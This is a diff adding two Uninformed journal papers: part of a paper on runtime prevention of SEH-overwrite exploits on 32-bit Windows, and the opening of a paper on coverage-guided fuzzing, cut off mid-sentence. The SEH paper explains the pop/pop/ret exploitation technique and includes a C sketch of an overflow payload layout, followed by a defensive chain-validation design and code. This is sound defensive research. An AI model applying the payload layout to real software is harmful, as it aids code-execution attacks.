+00401075 8be5 mov esp,ebp
+00401077 5d pop ebp
+00401078 c3 ret
+
+
+The actual registration of the exception handler all occurs behind the scenes
+in the C code. However, in the assembly code, the registration of the
+exception handler starts at 0x0040100a and spans four instructions. It is
+these four instructions that are responsible for registering the exception
+handler for the calling thread. The way that this actually works is by
+chaining an EXCEPTION_REGISTRATION_RECORD to the front of the list of exception
+handlers. The head of the list of already registered exception handlers is
+found in the ExceptionList attribute of the NT_TIB structure. If no exception
+handlers are registered, this value will be set to 0xffffffff. The NT_TIB
+structure makes up the first part of the TEB, or Thread Environment Block,
+which is an undocumented structure used internally by Windows to keep track of
+per-thread state in user-mode. A thread's TEB can be accessed in a
+position-independent fashion by referencing addresses relative to the fs
+segment register. For example, the head of the exception list chain can be
+obtained through fs:[0].
+
+To make sense of the four assembly instructions that register the custom
+exception handler, each of the four instructions will be described
+individually. 
For reference purposes, the layout of the
+EXCEPTION_REGISTRATION_RECORD is described below:
+
+
+   +0x000 Next             : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+   +0x004 Handler          : Ptr32
+
+
+1. push 0x4011a4
+
+   The first instruction pushes the address of the CRT generated
+   _except_handler3 symbol. This routine is responsible for dispatching
+   general exceptions that are registered through the __except compiler
+   intrinsic. The key thing to note here is that the virtual address of
+   a function is pushed onto the stack that is expected to be referenced
+   in the event that an exception is thrown. This push operation is the
+   first step in dynamically constructing an
+   EXCEPTION_REGISTRATION_RECORD on the stack by first setting the
+   Handler attribute.
+
+2. mov eax,fs:[00000000]
+
+   The second instruction takes the current pointer to the first
+   EXCEPTION_REGISTRATION_RECORD and stores it in eax.
+
+3. push eax
+
+   The third instruction takes the pointer to the first exception
+   registration record in the exception list and pushes it onto the
+   stack. This, in turn, sets the Next attribute of the record that is
+   being dynamically generated on the stack. Once this instruction
+   completes, a populated EXCEPTION_REGISTRATION_RECORD will exist on
+   the stack that takes the following form:
+
+
+   +0x000 Next             : 0x0012ffb0
+   +0x004 Handler          : 0x004011a4   ex!_except_handler3+0
+
+
+4. mov fs:[00000000],esp
+
+   Finally, the dynamically generated exception registration record is
+   stored as the first exception registration record in the list for the
+   current thread. This completes the process of inserting a new
+   registration record into the chain of exception handlers.
+
+
+The important things to take away from this description of exception
+handler registration are as follows. First, the registration of
+exception handlers is a runtime operation. This means that whenever a
+function is entered that makes use of an exception handler, it must
+dynamically register the exception handler. This has implications as it
+relates to performance overhead. Second, the list of registered
+exception handlers is stored on a per-thread basis. This makes sense
+because threads are considered isolated units of execution and therefore
+exception handlers are only relevant to a particular thread. The final,
+and perhaps most important, thing to take away from this is that the
+assembly generated by the compiler to register an exception handler at
+runtime makes use of the current thread's stack. This fact will be
+revisited later in this section.
+
+In the event that an exception occurs during the course of normal
+execution, the operating system will step in and take the necessary
+steps to dispatch the exception. In the event that the exception
+occurred in the context of a thread that is running in user-mode, the
+kernel will take the exception information and generate an
+EXCEPTION_RECORD that is used to encapsulate all of the exception
+information. Furthermore, a snapshot of the executing state of the
+thread is created in the form of a populated CONTEXT structure. The
+kernel then passes this information off to the user-mode thread by
+transferring execution from the location that the fault occurred at to
+the address of ntdll!KiUserExceptionDispatcher. The important thing to
+understand about this is that execution of the exception dispatcher
+occurs in the context of the thread that generated the exception.
+
+The job of ntdll!KiUserExceptionDispatcher is, as the name implies, to
+dispatch user-mode exceptions.
As one might guess, the way that it goes about doing
+this is by walking the chain of registered exception handlers stored relative
+to the current thread. As the exception dispatcher walks the chain, it calls
+the handler associated with each registration record, giving that handler the
+opportunity to handle, fail, or pass on the exception.
+
+
+While there are other things involved in the exception dispatching process,
+this description will suffice to set the stage for how it might be abused to
+gain code execution.
+
+
+2.2) Gaining Code Execution
+
+There is one important thing to remember when it comes to trying to gain code
+execution through an SEH overwrite. Put simply, the fact that each exception
+registration record is stored on the stack lends itself well to abuse when
+considered in conjunction with a conventional stack-based buffer overflow. As
+described in the previous section, each exception registration record is
+composed of a Next pointer and a Handler function pointer. Of most interest in
+terms of exploitation is the Handler attribute. Since the exception dispatcher
+makes use of this attribute as a function pointer, it makes sense that should
+this attribute be overwritten with attacker controlled data, it would be
+possible to gain code execution. In fact, that's exactly what happens, but
+with an added catch.
+
+While typical stack-based buffer overflows work by overwriting the return
+address, an SEH overwrite works by overwriting the Handler attribute of an
+exception registration record that has been stored on the stack. Unlike
+overwriting the return address, where control is gained immediately upon return
+from the function, an SEH overwrite does not actually gain code execution until
+after an exception has been generated. The exception is necessary in order to
+cause the exception dispatcher to call the overwritten Handler.
+
+While this may seem like something of a nuisance that would make SEH overwrites
+harder to exploit, it's not. Generating an exception that leads to the calling
+of the Handler is as simple as overwriting the return address with an invalid
+address in most cases. When the function returns, it attempts to execute code
+from an invalid memory address, which generates an access violation exception.
+This exception is then passed on to the exception dispatcher, which calls the
+overwritten Handler.
+
+The obvious question to ask at this point is what benefit SEH overwrites have
+over the conventional practice of overwriting the return address. To
+understand this, it's important to consider one of the common practices
+employed in Windows-based exploits. On Windows, thread stack addresses tend to
+change quite frequently between operating system revisions and even across
+process instances. This differs from most UNIX derivatives where stack
+addresses are typically predictable across multiple operating system revisions.
+Due to this fact, most Windows-based exploits will indirectly transfer control
+into the thread's stack by first bouncing off an instruction that exists
+somewhere in the address space. This instruction must typically reside at an
+address that is less prone to change, such as within the code section of a
+binary. The purpose of this instruction is to transfer control back to the
+stack in a position-independent fashion. For example, a jmp esp instruction
+might be used.
While this approach works perfectly fine, it's limited by
+whether or not an instruction can be located that is both portable and reliable
+in terms of the address that it resides at. This is where the benefits of SEH
+overwrites begin to become clear.
+
+When simply overwriting the return address, an attacker is often limited to a
+small set of instructions that are not typically common to find at a reliable
+and portable location in the address space. On the other hand, SEH overwrites
+have the advantage of being able to use another set of instructions that are
+far more prevalent in the address space of almost every process. This set of
+instructions is commonly referred to as pop/pop/ret. The reason this class of
+instructions can be used with SEH overwrites and not general stack overflows
+has to do with the method in which exception handlers are called by the
+exception dispatcher. To understand this, it is first necessary to know what
+the specific prototype is for the Handler field in the
+EXCEPTION_REGISTRATION_RECORD structure:
+
+
+typedef EXCEPTION_DISPOSITION (*ExceptionHandler)(
+    IN PEXCEPTION_RECORD ExceptionRecord,
+    IN PVOID EstablisherFrame,
+    IN PCONTEXT ContextRecord,
+    IN PVOID DispatcherContext);
+
+
+The field of most importance is the EstablisherFrame. This field actually
+points to the address of the exception registration record that was pushed onto
+the stack. It is also located at [esp+8] when the Handler is called.
+Therefore, if the Handler is overwritten with the address of a pop/pop/ret
+sequence, the result will be that the execution path of the current thread will
+be transferred to the address of the Next attribute for the current exception
+registration record. While this field would normally hold the address of the
+next registration record, it instead can hold four bytes of arbitrary code that
+an attacker can supply when triggering the SEH overwrite. Since there are only
+four contiguous bytes of memory to work with before hitting the Handler field,
+most attackers will use a simple short jump sequence to jump past the handler
+and into the attacker controlled code that comes after it.
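+
+To make the mechanics above concrete, the following is a small, hedged C
+sketch of the buffer layout that is typically used when leveraging an SEH
+overwrite in the manner just described. The buffer size, the offset of the
+registration record, and the pop/pop/ret address are invented for
+illustration only; they are not taken from any particular vulnerability.
+
+#include <string.h>
+
+unsigned char payload[512];
+
+/* Illustrative layout: the overflow runs into the registration record on
+   the stack.  Next receives a short jump over the Handler field, Handler
+   receives the address of a pop/pop/ret sequence.  When the dispatcher
+   later calls Handler, the pop/pop/ret lands execution on the short jump
+   stored in Next, which in turn jumps to the code placed after the
+   record. */
+void BuildPayloadSketch(unsigned long PopPopRetAddress)
+{
+    /* jmp short $+8, padded with two nops */
+    unsigned char jmp_short[4] = { 0xEB, 0x06, 0x90, 0x90 };
+
+    memset(payload, 0x41, sizeof(payload));      /* filler up to the record */
+    memcpy(&payload[256], jmp_short, 4);         /* overwrites Next          */
+    memcpy(&payload[260], &PopPopRetAddress, 4); /* overwrites Handler       */
+    /* payload[264] onward would hold the attacker supplied code.            */
+}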
+
+
+3) Design
+
+The one basic requirement of any solution attempting to prevent the leveraging
+of SEH overwrites is that it must not be possible for an attacker to supply a
+value for the Handler attribute of an exception registration record that is
+subsequently used in an unchecked fashion by the exception dispatcher when an
+exception occurs. If a solution can claim to have satisfied this requirement,
+then it should be true that the solution is secure.
+
+To that point, Microsoft's solution is secure, but only if all of the images
+loaded in the address space have been compiled with /SAFESEH. Even then, it's
+possible that it may not be completely secure. For example, it should be
+possible to overwrite the Handler with the address of some non-image associated
+executable region, if one can be found. If there are any images that have not
+been compiled with /SAFESEH, it may be possible for an attacker to overwrite
+the Handler with an address of an instruction that resides within an
+unprotected image. The reason Microsoft's implementation cannot protect
+against this is because SafeSEH works by having the exception dispatcher
+validate handlers against a table of image-specific safe exception handlers
+prior to calling an exception handler. Safe exception handlers are stored in a
+table that is contained in any executable compiled with /SAFESEH. Given this
+limitation, it can also be said that Microsoft's implementation is not secure
+given the appropriate conditions. In fact, for third-party applications, and
+even some Microsoft-provided applications, these conditions are considered by
+the author to be the norm rather than the exception. In the end, it all boils
+down to the fact that Microsoft's solution is a compile-time solution rather
+than a runtime solution. With these limitations in mind, it makes sense to
+attempt to approach the problem from the angle of a runtime solution rather
+than a compile-time solution.
+
+When it comes to designing a runtime solution, the important consideration that
+has to be made is that it will be necessary to intercept exceptions before they
+are passed off to the registered exception handlers by the exception
+dispatcher. The particulars of how this can be accomplished will be discussed
+in the next chapter. Assuming a solution is found to the layering problem, the
+next step is to come up with a solution for determining whether or not an
+exception handler is valid and has not been tampered with. While there are
+many inefficient solutions to this problem, such as coming up with a solution
+to keep a ``secure'' list of registered exception handlers, there is one
+solution in particular that the author feels is best suited for the problem.
+
+One of the side effects of an SEH overwrite is that the attacker will typically
+clobber the value of the Next attribute associated with the exception
+registration record that is overwritten. This occurs because the Next
+attribute precedes the Handler attribute in memory, and therefore must be
+overwritten before the Handler in the case of a typical buffer overflow. This
+has a very important side effect that is the key to facilitating the
+implementation of a runtime solution. In particular, the clobbering of the
+Next attribute means that all subsequent exception registration records would
+not be reachable by the exception dispatcher when walking the chain.
+
+Consider for the moment a solution that, during thread startup, places a custom
+exception registration record as the very last exception registration record in
+the chain. This exception registration record will be symbolically referred to
+as the validation frame henceforth. From that point forward, whenever an
+exception is about to be dispatched, the solution could walk the chain prior to
+allowing the exception dispatcher to handle the exception. The purpose of
+walking the chain beforehand is to ensure that the validation frame can be
+reached. As such, the validation frame's purpose is similar to that of stack
+canaries. If the validation frame can be reached, then that is evidence that
+the chain of exception handlers has not been corrupted. As described above,
+the act of overwriting the Handler attribute also requires that the Next
+pointer be overwritten. If the Next pointer is not overwritten with an address
+that ensures the integrity of the exception handler chain, then this solution
+can immediately detect that the integrity of the chain is in question and
+prevent the exception dispatcher from calling the overwritten Handler.
+
+Using this technique, the act of ensuring that the integrity of the exception
+handler chain is kept intact results in the ability to prevent SEH overwrites.
+The important questions to ask at this point center around what limitations
+this solution might have.
The most obvious question to ask is what's to stop
+an attacker from simply overwriting the Next pointer with the value that was
+already there. There are a few things that stop this. First of all, it will
+be common that the attacker does not know the value of the Next pointer.
+Second, and perhaps most important, is that one of the benefits of using an SEH
+overwrite is that an attacker can make use of a pop/pop/ret sequence. By
+forcing an attacker to retain the value of the Next pointer, the major benefit
+of using an SEH overwrite in the first place is gone. Even conceding this
+point, an attacker who is able to retain the value of the Next pointer would
+find themselves limited to overwriting the Handler with the address of
+instructions that indirectly transfer control back to their code. However, the
+attacker won't simply be able to use an instruction like jmp esp because the
+Handler will be called in the context of the exception dispatcher. It's at
+this point that diminishing returns are reached and an attacker is better off
+simply overwriting the return address, if possible.
+
+Another important question to ask is what's to stop the attacker from
+overwriting the Next pointer with the address of the validation frame itself
+or, more easily, with 0xffffffff. The answer to this is much the same as
+described in the above paragraph. Specifically, by forcing an attacker away
+from the pop/pop/ret sequence, the usefulness of the SEH overwrite vector
+quickly degrades to the point of it being better to simply overwrite the return
+address, if possible. However, in order to be sure, the author feels that
+implementations of this solution would be wise to randomize the location of the
+validation frame.
+
+It is the author's opinion that the solution described above satisfies the
+requirement outlined in the beginning of this chapter and therefore qualifies
+as a secure solution. However, there's always a chance that something has been
+missed. For that reason, the author is more than happy to be proven wrong on
+this point.
+
+
+4) Implementation
+
+The implementation of the solution described in the previous chapter relies on
+intercepting exceptions prior to allowing the native exception dispatcher to
+handle them such that the exception handler chain can be validated. First and
+foremost, it is important to identify a way of layering prior to the point that
+the exception dispatcher transfers control to the registered exception
+handlers. There are a few different places that this layering could occur at,
+but the one that is best suited to catch the majority of user-mode exceptions
+is at the location that ntdll!KiUserExceptionDispatcher gains control.
+However, by hooking ntdll!KiUserExceptionDispatcher, it is possible that this
+implementation may not be able to intercept all cases of an exception being
+raised, thus making it potentially feasible to bypass the exception handler
+chain validation.
+
+The best location to layer at would be ntdll!RtlDispatchException. The reason
+for this is that exceptions raised through ntdll!RtlRaiseException, such as
+software exceptions, may be passed directly to ntdll!RtlDispatchException
+rather than going through ntdll!KiUserExceptionDispatcher first. The condition
+that controls this is whether or not a debugger is attached to the user-mode
+process when ntdll!RtlRaiseException is called. The reason
+ntdll!RtlDispatchException is not hooked in this implementation is because it
+is not directly exported.
There are, however, fairly reliable techniques that
+could be used to determine its address. As far as the author is aware, the act
+of hooking ntdll!KiUserExceptionDispatcher should mean that it's only possible
+to miss software exceptions, which are much harder, and in most cases
+impossible, for an attacker to generate.
+
+In order to layer at ntdll!KiUserExceptionDispatcher, the first few
+instructions of its prologue can be overwritten with an indirect jump to a
+function that will be responsible for performing any sanity checks necessary.
+Once the function has completed its sanity checks, it can transfer control back
+to the original exception dispatcher by executing the overwritten instructions
+and then jumping back into ntdll!KiUserExceptionDispatcher at the offset of the
+next instruction to be executed. This is a nice and ``clean'' way of
+accomplishing this, and the performance overhead is minuscule (where ``clean''
+is defined as the best it can get from a third-party perspective).
+
+In order to hook ntdll!KiUserExceptionDispatcher, the first n instructions,
+where n is the number of instructions that it takes to cover at least 6 bytes,
+must be copied to a location that will be used by the hook to execute the
+actual ntdll!KiUserExceptionDispatcher. Following that, the first n
+instructions of ntdll!KiUserExceptionDispatcher can then be overwritten with an
+indirect jump. This indirect jump will be used to transfer control to the
+function that will validate the exception handler chain prior to allowing the
+original exception dispatcher to handle the exception.
+
+With the hook installed, the next step is to implement the function that will
+actually validate the exception handler chain. The basic steps involved in
+this are to first extract the head of the list from fs:[0] and then iterate
+over each entry in the list. For each entry, the function should validate that
+the Next attribute points to a valid memory location. If it does not, then the
+chain can be assumed to be corrupt. However, if it does point to valid memory,
+then the routine should check to see if the Next pointer is equal to the
+address of the validation frame that was previously stored at the end of the
+exception handler chain for this thread. If it is equal to the validation
+frame, then the integrity of the chain is confirmed and the exception can be
+passed to the actual exception dispatcher.
+
+However, if the function reaches an invalid Next pointer, or it reaches
+0xffffffff without encountering the validation frame, then it can assume that
+the exception handler chain is corrupt. It's at this point that the function
+can take whatever steps are necessary to discard the exception, log that a
+potential exploitation attempt occurred, and so on. The end result should be
+the termination of either the thread or the process, depending on
+circumstances. This algorithm is captured by the pseudo-code below:
+
+
+CurrentRecord = fs:[0];
+ChainCorrupt  = TRUE;
+while (CurrentRecord != 0xffffffff) {
+   if (IsInvalidAddress(CurrentRecord->Next))
+      break;
+   if (CurrentRecord->Next == ValidationFrame) {
+      ChainCorrupt = FALSE;
+      break;
+   }
+   CurrentRecord = CurrentRecord->Next;
+}
+if (ChainCorrupt == TRUE)
+   ReportExploitationAttempt();
+else
+   CallOriginalKiUserExceptionDispatcher();
+
+
+The above algorithm describes how the exception dispatching path should be
+handled.
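+
+For concreteness, the following is a minimal C sketch of what such a
+validation routine might look like. It assumes the simplified registration
+record structure sketched earlier, a hypothetical g_ValidationFrame pointer
+established at thread startup, and it uses IsBadReadPtr only to approximate
+the address-validity test described above; it also differs slightly from the
+pseudo-code in that it validates each record before dereferencing it.
+
+#include <windows.h>
+#include <intrin.h>
+
+typedef struct _SEH_REGISTRATION
+{
+    struct _SEH_REGISTRATION *Next;
+    void                     *Handler;
+} SEH_REGISTRATION;
+
+/* Hypothetical pointer to the validation frame appended to the end of
+   the chain at thread startup.  A real implementation would track this
+   on a per-thread basis rather than globally. */
+SEH_REGISTRATION *g_ValidationFrame;
+
+BOOL IsExceptionChainIntact(void)
+{
+    SEH_REGISTRATION *Record = (SEH_REGISTRATION *)__readfsdword(0);
+
+    while (Record != (SEH_REGISTRATION *)0xffffffff)
+    {
+        if (IsBadReadPtr(Record, sizeof(*Record)))
+            return FALSE;              /* chain points somewhere bogus   */
+
+        if (Record == g_ValidationFrame)
+            return TRUE;               /* reached the validation frame   */
+
+        Record = Record->Next;
+    }
+
+    return FALSE;                      /* end of chain, frame never seen */
+}
+
+If the routine returns FALSE, the hook would report the exploitation attempt
+rather than passing the exception on to the original dispatcher.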
+
+However, there is one important part remaining in order to implement this
+solution. Specifically, there must be some way of registering the validation
+frame with a thread prior to any exceptions being dispatched on that thread.
+There are a few ways that this can be accomplished. In terms of a proof of
+concept, the easiest way of doing this is to implement a DLL that, when loaded
+into a process' address space, catches the creation notification of new threads
+through a mechanism like DllMain or through the use of a TLS callback in the
+case of a statically linked library. Both of these approaches provide a
+location for the solution to establish the validation frame with the thread
+early on in its execution. However, if there were ever a case where the thread
+were to raise an exception prior to one of these routines being called, then
+the solution would improperly detect that the exception handler chain was
+corrupt.
+
+One solution to this potential problem is to store state relative to each
+thread that keeps track of whether or not the validation frame has been
+registered. There are certain implications about doing this, however. First,
+it could introduce a security problem in that an attacker might be able to
+bypass the protection by somehow toggling the flag that tracks whether or not
+the validation frame has been registered. If this flag were to be toggled to
+indicate that no validation frame had been registered and an exception were
+generated in the thread, then the solution would have to assume that it can't
+validate the chain because no validation frame has been installed. Another
+issue with this is that it would require some location to store this state on a
+per-thread basis. A good example of a place to store this is in TLS, but
+again, it has the security implications described above.
+
+A more invasive solution to the problem of registering the validation frame
+would be to somehow layer very early on in the thread's execution -- perhaps
+even before it begins executing from its entry point. The author is aware of a
+good way to accomplish this, but it will be left as an exercise for the reader
+to determine what this might be. This more invasive approach would also be an
+easy and elegant way for Microsoft to include support for this, should they
+ever choose to do so.
+
+The final matter of how to go about implementing this solution centers around
+how it could be deployed and used with existing applications without requiring
+a recompile. The easiest way to do this in a proof of concept setting would be
+to implement these protection mechanisms in the form of a DLL that can be
+dynamically loaded into the address space of a process that is to be protected.
+Once loaded, the DLL's DllMain can take care of getting everything set up. A
+simple way to cause the DLL to be loaded is through the use of AppInitDLLs,
+although this has some limitations. Alternatively, there are more invasive
+options that can be considered that will accomplish the goal of loading and
+initializing the DLL early on in process creation.
+
+One interesting thing about this approach is that while it is targeted at being
+used as a runtime solution, it can also be used as a compile-time solution.
+This means that applications can use this solution at compile-time to protect
+themselves from SEH overwrites. Unlike Microsoft's solution, this will even
+protect them in the presence of third-party images that have not been compiled
+with the support.
This can be accomplished through the use of a static library +that uses TLS callbacks to receive notifications when threads are created, much +like DllMain is used for DLL implementations of this solution. + +All things considered, the author believes that the implementation described +above, for all intents and purposes, is a fairly simplistic way of providing +runtime protection against SEH overwrites that has minimal overhead. While the +implementation described in this document is considered more suitable for a +proof-of-concept or application-specific solution, there are real-world +examples of more robust implementations, such as in Wehnus's WehnTrust product, +a commercial side-project of the author's. Apologies for the shameless plug. + + +5) Compatibility + +Like most security solutions, there are always compatibility problems that must +be considered. As it relates to the solution described in this paper, there +are a couple of important things to keep in mind. + +The first compatibility issue that might happen in the real world is a scenario +where an application invalidates the exception handler chain in a legitimate +fashion. The author is not currently aware of situations where an application +would legitimately need to do this, but it has been observed that some +applications, such as cygwin, will do funny things with the exception handler +chain that are not likely to play nice with this form of protection. In the +event that an application invalidates the exception handler chain, the solution +described in this paper may inadvertently detect that an SEH overwrite has +occurred simply because it is no longer able to reach the validation frame. + +Another compatibility issue that may occur centers around the fact that the +implementation described in this paper relies on the hooking of functions. In +almost every situation it is a bad idea to use function hooking, but there are +often situations where there is no alternative, especially in closed source +environments. The use of function hooking can lead to compatibility problems +with other applications that also hook ntdll!KiUserExceptionDispatcher. There +may also be instances of security products that detect the hooking of +ntdll!KiUserExceptionDispatcher and classify it as malware-like behavior. In +any case, these compatibility concerns center less around the fundamental +concept and more around the specific implementation that would be required of a +third-party. + + +6) Conclusion + +Software-based vulnerabilities are a common problem that affect a wide array of +operating systems. In some cases, these vulnerabilities can be exploited with +greater ease depending on operating system specific features. One particular +case of where this is possible is through the use of an SEH overwrite on 32-bit +applications on the Windows platform. An SEH overwrite involves overwriting the +Handler associated with an exception registration record. Once this occurs, an +exception is generated that results in the overwritten Handler being called. +As a result of this, the attacker can more easily gain control of code +execution due to the context that the exception handler is called in. + +Microsoft has attempted to address the problem of SEH overwrites with +enhancements to the exception dispatcher itself and with solutions like SafeSEH +and the /GS compiler flag. However, these solutions are limited because they +require a recompilation of code and therefore only protect images that have +been compiled with these flags enabled. 
This limitation is something that +Microsoft is aware of and it was most likely chosen to reduce the potential for +compatibility issues. + +To help solve the problem of not offering complete protection against SEH +overwrites, this paper has suggested a solution that can be used without any +code recompilation and with negligible performance overhead. The solution +involves appending a custom exception registration record, known as a +validation frame, to the end of the exception list early on in thread startup. +When an exception occurs in the context of a thread, the solution intercepts +the exception and validates the exception handler chain for the thread by +making sure that it can walk the chain until it reaches the validation frame. +If it is able to reach the validation frame, then the exception is dispatched +like normal. However, if the validation frame cannot be reached, then it is +assumed that the exception handler chain is corrupt and that it's possible that +an exploit attempt may have occurred. Since exception registration records are +always prepended to the exception handler chain, the validation frame is +guaranteed to always be the last handler. + +This solution relies on the fact that when an SEH overwrite occurs, the Next +attribute is overwritten before overwriting the Handler attribute. Due to the +fact that attackers typically use the Next attribute as the location at which +to store a short jump, it is not possible for them to both retain the integrity +of the list and also use it as a location to store code. This important +consequence is the key to being able to detect and prevent the leveraging of an +SEH overwrite to gain code execution. + +Looking toward the future, the usefulness of this solution will begin to wane +as 64-bit versions of Windows begin to dominate the desktop environment. The +reason 64-bit versions are not affected by this solution is because exception +handling on 64-bit versions of Windows is inherently secure due to the way it's +been implemented. However, this only applies to 64-bit binaries. Legacy +32-bit binaries that are capable of running on 64-bit versions of Windows will +continue to use the old style of exception handling, thus potentially leaving +them vulnerable to the same style of attacks depending on what compiler flags +were used. On the other hand, this solution will also become less necessary due +to the fact that modern 32-bit x86 machines support hardware NX and can +therefore help to mitigate the execution of code from the stack. Regardless of +these facts, there will always be a legacy need to protect against SEH +overwrites, and the solution described in this paper is one method of providing +that protection. + +A. References + +Borland. United States Patent: 5628016. +http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=2Fnetahtml2FPTO2Fsrchnum.htm&r=1&f=G&l=50&s1=5,628,016.PN.&OS=PN/5,628,016&RS=PN/5,628,016; +accessed Sep 5, 2006. + + +Litchfield, David. Defeating the Stack based Buffer +Overflow Prevention Mechanism of Microsoft Windows 2003 Server. + +http://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf; +accessed Sep 5, 2006. + + +Microsoft Corporation. Structured Exception Handling. + +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/structured_exception_handling.asp; +accessed Sep 5, 2006. + + +Microsoft Corporation. Working with the AppInitDLLs +registry value. 
+ +http://support.microsoft.com/default.aspx?scid=kb;en-us;197571; +accessed Sep 5, 2006. + + +Microsoft Corporation. /GS (Buffer Security Check) + +http://msdn2.microsoft.com/en-us/library/8dbf701c.aspx; +accessed Sep 5, 2006. + + +Nagy, Ben. SEH (Structured Exception Handling) Security +Changes in XPSP2 and 2003 SP1. + +http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html#vexposed; +accessed Sep 8, 2006. + + +Pietrek, Matt. A Crash Course on the Depths of Win32 +Structured Exception Handling. + +http://www.microsoft.com/msj/0197/exception/exception.aspx; +accessed Sep 8, 2006. + + +skape. Improving Automated Analysis of Windows x64 +Binaries. +http://www.uninformed.org/?v=4&a=1&t=sumry; accessed +Sep 5, 2006. + + +Wehnus. WehnTrust. +http://www.wehnus.com/products.pl; accessed Sep 5, +2006. + + +Wikipedia. Matryoshka Doll. +http://en.wikipedia.org/wiki/Matryoshka_doll; +accessed Sep 18, 2006. + + +Wine. CompilerExceptionSupport. +http://wiki.winehq.org/CompilerExceptionSupport; +accessed Sep 5, 2006. + + + diff --git a/uninformed/5.3.txt b/uninformed/5.3.txt new file mode 100644 index 0000000..b71b744 --- /dev/null +++ b/uninformed/5.3.txt @@ -0,0 +1,659 @@ +Effective Bug Discovery +9/2006 +vf +vf@nologin.org + + +"If we knew what it was we were doing, it would not be +called research, would it?" + + - Albert Einstein + + +1) Foreword + +Abstract: Sophisticated methods are currently being developed and +implemented for mitigating the risk of exploitable bugs. The process of +researching and discovering vulnerabilities in modern code will require +changes to accommodate the shift in vulnerability mitigations. Code +coverage analysis implemented in conjunction with fuzz testing reveals +faults within a binary file that would have otherwise remained +undiscovered by either method alone. This paper suggests a research +method for more effective runtime binary analysis using the +aforementioned strategy. This study presents empirical evidence that +despite the fact that bug detection will become increasingly difficult +in the future, analysis techniques have an opportunity to evolve +intelligently. + +Disclaimer: Practices and material presented within this paper are meant +for educational purposes only. The author does not suggest using this +information for methods which may be deemed unacceptable. The content in +this paper is considered to be incomplete and unfinished, and therefore +some information in this paper may be incorrect or inaccurate. +Permission to make digital or hard copies of all or part of this work +for personal or classroom use is granted without fee provided that +copies are not made or distributed for profit or commercial advantage +and that copies bear this notice and the full citation on the first +page. To copy otherwise, to republish, requires prior specific +permission. + +Prerequisites: For an in-depth understanding of the concepts presented +in this paper, a familiarity with Microsoft Windows device drivers, +working with x86 assembler, debugging fundamentals, and the Windows +kernel debugger is required. A brief introduction to the current state +of code coverage analysis, including related uses, is introduced to +support information presented within this paper. However, to implement +the practices within this paper a deeper knowledge of aforementioned +vulnerability discovery methods and methodologies are required. 
The
+following software and knowledge of its use is required to follow along
+with the discussion: IDA Pro, Debugging Tools for Windows, Debug Stalk,
+and a virtual machine such as VMware or Virtual PC.
+
+Thanks: The author would like to thank west, icer, skape, Uninformed,
+and mom.
+
+
+2) Introduction
+
+
+2.1) The status of vulnerability research
+
+Researchers employ a myriad of investigative techniques in the quest for
+vulnerabilities. In any case, there exists no silver bullet for the
+discovery of security related software bugs, not to mention the fact
+that several new security oriented kernel-mode components have recently
+been integrated into Microsoft operating systems that can make
+vulnerability investigations more difficult. Vista, particularly in the
+64-bit edition, is integrating several mechanisms including driver
+signing, Secure Bootup using a TPM hardware chip, PatchGuard,
+kernel-mode integrity checks, and restricted user-mode access to . The
+Vista kernel also has an improved Low Fragmentation Heap and Address
+Space Layout Randomization. In earlier days, bugs were revealed via dumb
+fuzzing techniques, whereas this year more complicated bugs indicate
+that triggering them requires an advanced understanding of the format
+being parsed. Because of this, researchers are moving towards different
+discovery methods such as intelligent, rather than dumb, testing of
+drivers and applications.
+
+
+2.2) The problem with fuzzing
+
+To compound the conception that these environments are becoming more
+difficult to test, monolithic black box fuzz testing, while frequently
+efficacious in its purpose, has a tendency to exhibit a lack of potency.
+The term ``monolithic'' is included as a reference to a comprehensive
+execution of the entire application or driver. Fuzzing is often executed
+in an environment where the tester does not know the internals of the
+binary in question. This leads to disadvantages in which a large number
+of tests must be executed to get an accurate estimate of the binary's
+reliability. This investigation can be a daunting task if not
+implemented in a constructive manner. The test program and data
+selection should ensure independence from unrelated tests or groups of
+tests, thereby gaining the ability to achieve complete coverage by
+reducing dependency on specific variables and their decision branching.
+
+Another disadvantage of monolithic black box fuzz testing is that it is
+difficult to provide coverage analysis even though the testing selection
+may cover the entire suite of security testing models. A further
+complication in this type of testing is that of cyclic dependencies
+causing cyclic arguments, which in turn leads to a lessening of coverage
+assurance.
+
+
+2.3) Expectations
+
+This paper aims to educate the reader on the espousal of code coverage
+analysis and fuzzing philosophy presented by researchers as a means to
+lighten the burden of bug detection. A kernel mode device driver will be
+fuzzed for bugs using a standard fuzzing method. Results from the
+initial fuzzing test will be examined to determine coverage. The fuzz
+testing method will then be revised to accommodate coverage concerns,
+and an execution graph will be generated to view the results of the
+previous testing. A comparison is then made between the two prior
+testing methods, demonstrating how code coverage analysis through kernel
+mode Stalking can improve fuzzing endeavors.
+ + +3) QA + +Before understanding how the methodologies presented in this paper can +be used, a few simple definitions and descriptions are addressed for the +benefit of the reader. + + +3.1) What is code coverage? + +Code coverage, as represented by a Control Flow Graph (CFG), is defined +as a measure of the exercised code within a program undergoing software +testing. For the purpose of vulnerability research, the goal is to +utilize code coverage analysis to obtain an exhaustive execution of all +possible paths through code and data flow that may be relevant for +revealing failures. It is used as a good metric in determining how a +specific set of tests can uncover numerous faults. Techniques of proper +code coverage analysis presented in this paper utilize basic +mathematical properties of graph theory by including elements such as +vertices, links and edges. Graph theory has lain somewhat dormant until +recently being utilized by computer scientists which have subsequently +defined their own sets of vocabulary for the subject. For the sake of +research continuity and to link mathematical to computer science +definitions, the verbiage used within this paper will equate vertices to +code blocks, branches to decisions, and edges to code paths. + +To support our hypothesis, the aforementioned graph theory elements are +compiled into CFGs. Informally, a Control Flow Graph is a directed graph +composed of a finite set of vertices connected by edges indicating all +possible routes a driver or application may take during execution. In +other words, a CFG is merely blocks of code whose connected flow paths +are determined by decisions. Block execution consists of a sequence of +instructions which are free of branching or other control transfers +except for the last instruction. These include branches or decisions +which consist of Boolean expressions in a control structure. A path is a +sequence of nodes traveled through by a series of uninterrupted links. +Paths enable flow of information or data through code. In our case, a +path is an execution flow and is therefore essential to measuring code +coverage. Because of this factor, this investigation focuses directly on +determining which paths have been traversed, which blocks and +correlating data have been executed, and which links have been followed +and finally applying it to fuzzing techniques. + +The purpose of code coverage analysis is ultimately to require all +control decisions to be exercised. In other words, the application +needs to be executed thoroughly using enough inputs that all edges in +the graph are traversed at least once. These graphs will be represented +as diagrams in which blocks are squares, 